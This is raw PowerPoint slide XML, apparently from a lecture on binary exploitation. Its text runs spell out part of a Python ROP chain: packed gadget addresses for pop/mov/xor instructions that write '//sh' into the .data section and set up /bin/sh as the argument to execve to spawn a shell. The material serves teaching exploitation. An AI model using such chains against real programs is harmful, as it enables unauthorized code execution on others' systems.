                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>('&lt;I', 0x0806e91a) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>('&lt;I', 0x080ea064) # @.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> + 4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>('&lt;I', 0x080bb6d6) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> += '//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>('&lt;I', 0x0809a67d) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Zero</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> @.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> + 8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>('&lt;I', 0x0806e91a) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>('&lt;I', 0x080ea068) # @.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> + 8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>('&lt;I', 0x80541b0) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>('&lt;I', 0x0809a67d) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>360</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1366204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8155"/>
            <a:ext cx="8229600" cy="6400800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># Now the null-terminated string /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> will be at 0x080ea060, which is first argument to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># Next build up the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
